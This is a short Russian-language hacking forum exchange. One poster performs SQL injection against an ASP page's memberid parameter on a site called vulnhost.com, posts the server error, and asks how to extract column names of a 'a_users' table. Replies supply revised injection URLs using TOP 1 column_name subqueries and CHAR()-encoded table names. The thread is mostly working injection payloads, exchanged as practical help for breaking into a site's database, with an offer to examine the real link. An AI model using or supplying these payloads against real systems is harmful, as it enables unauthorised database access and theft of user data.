Всем здрасте!=) При банальном запросе вида: http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name='a_users')-- Получил ошибку, следующего содержания: Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables. /details.asp, line 59 Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?
Code: http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
Вот так делать не надо, будет ошибка : The char function requires 1 arguments. Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115) Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут
